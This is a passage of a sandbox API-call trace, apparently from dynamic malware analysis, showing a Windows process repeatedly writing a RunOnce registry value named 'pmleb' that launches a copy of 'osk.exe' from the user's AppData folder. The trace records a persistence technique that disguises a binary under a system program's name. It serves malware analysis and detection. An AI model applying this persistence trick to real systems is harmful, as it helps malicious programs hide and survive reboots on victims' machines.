cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.533] RegCloseKey (hKey=0x280) returned 0x0 [0082.533] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.533] SetTimer (hWnd=0x20280, nIDEvent=0x20f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f6 [0082.533] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.555] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.555] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.555] KillTimer (hWnd=0x20280, uIDEvent=0x20f6) returned 1 [0082.555] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.555] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.555] IUnknown:Release (This=0x787518) returned 0x1 [0082.556] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.556] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.556] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.556] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.556] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.556] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0082.556] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.556] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7c [0082.556] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.557] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0082.557] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.557] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.557] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.557] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.557] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.557] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.558] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.558] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.558] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.558] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.558] RegCloseKey (hKey=0x280) returned 0x0 [0082.558] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.558] SetTimer (hWnd=0x20280, nIDEvent=0x20f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f7 [0082.558] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.561] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.561] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.561] KillTimer (hWnd=0x20280, uIDEvent=0x20f7) returned 1 [0082.561] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.561] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.561] IUnknown:Release (This=0x787518) returned 0x1 [0082.561] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.561] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.561] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.561] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.561] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.561] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.561] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.562] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.562] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.562] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0082.562] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.562] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7d [0082.562] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.562] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0082.563] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.563] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.563] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.563] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.563] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.563] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.563] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.563] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.563] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.563] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.563] RegCloseKey (hKey=0x280) returned 0x0 [0082.563] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.564] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.564] SetTimer (hWnd=0x20280, nIDEvent=0x20f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f8 [0082.564] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.577] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.577] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.577] KillTimer (hWnd=0x20280, uIDEvent=0x20f8) returned 1 [0082.577] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.577] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.577] IUnknown:Release (This=0x787518) returned 0x1 [0082.578] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.578] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.578] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.578] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.578] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0082.578] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.578] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7e [0082.578] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.579] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0082.579] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.579] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.579] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.580] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.580] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.580] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.580] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, 